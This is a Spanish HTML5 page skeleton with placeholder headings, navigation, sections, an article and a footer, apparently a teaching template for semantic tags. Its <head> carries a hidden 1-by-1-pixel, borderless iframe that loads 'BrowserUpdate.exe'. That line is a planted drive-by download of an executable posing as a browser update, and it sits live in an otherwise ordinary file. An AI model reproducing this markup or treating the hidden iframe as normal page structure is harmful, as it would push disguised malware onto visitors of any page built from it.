<!DOCTYPE html> <html lang="es"> <!-- Hojas de estilo en cascada --> <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe> <title>TITULO DE LA PAGINA </title> <meta charset="utf-8" /> <meta description="DESCRIPCION DE LA PAGINA"> <link rel="stylesheet" type="text/css" media="all" href="css/Estilos_2.css" /> </head> <body background=Fondo.jpg> <header> <h1>TITULO</h1> <figure> LOGOTIPO <figdescription>TITULO DE LA FIGURA</figdescription> </figure> </header> <nav> MENÚ </nav> <section> <hgroup> <h1>Encabezado secundario</h1> <h2>encabezado de tipo h2</h2> <h3>etc</h3> </hgroup> <article> ARTÍCULO <section> POSIBLEMENTE OTRA section </section> </article> </section> <footer> REFERENCIAS O RESUMEN DE PAGINA <<Copy Right>> </footer> </body> </html>